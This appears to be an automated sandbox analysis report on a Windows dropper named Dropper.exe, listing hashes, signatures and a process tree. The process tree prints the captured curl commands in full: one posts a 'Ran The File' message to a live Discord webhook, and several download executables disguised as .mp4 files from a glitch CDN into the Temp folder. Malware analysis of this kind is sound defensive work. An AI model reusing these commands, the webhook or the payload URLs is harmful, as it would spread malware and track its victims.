Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-06-2024 08:16

General

  • Target

    Dropper.exe

  • Size

    12KB

  • MD5

    13eb5be5584766a9f95d058b74c01fae

  • SHA1

    859b917932b9ce6610a5eb90c315cfd4f728f200

  • SHA256

    58d82fcd47e89b187c3d6aa5ab70d5ea876968d223490ac1b3b24e4c71715292

  • SHA512

    ea1fc5c2c8b0194863b8bf68a4d432b269ac666bcd6d8dd65b1e2d5e4e1926ccc9b013e42f39f100b99ba106253d85c33d1ac6ec89d51f8023b73444fa3a5a6e

  • SSDEEP

    384:pHPELyODmB7q9bJnz6PbQGw+pfolHfhhDd4VCsw:1EmO6s9bJMbK/hhDawsw

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
        PID:2592
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        3⤵
        PID:2664
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
        3⤵
        PID:2792
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
        3⤵
        PID:2556
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
        3⤵
        PID:2720

Network

MITRE ATT&CK Matrix ATT&CK v13

Downloads

  • memory/1312-0-0x000000007436E000-0x000000007436F000-memory.dmp
    Filesize

    4KB

  • memory/1312-1-0x0000000001070000-0x000000000107A000-memory.dmp
    Filesize

    40KB

  • memory/2640-2-0x00000000742E0000-0x00000000749CE000-memory.dmp
    Filesize

    6.9MB

  • memory/2640-3-0x00000000742E0000-0x00000000749CE000-memory.dmp
    Filesize

    6.9MB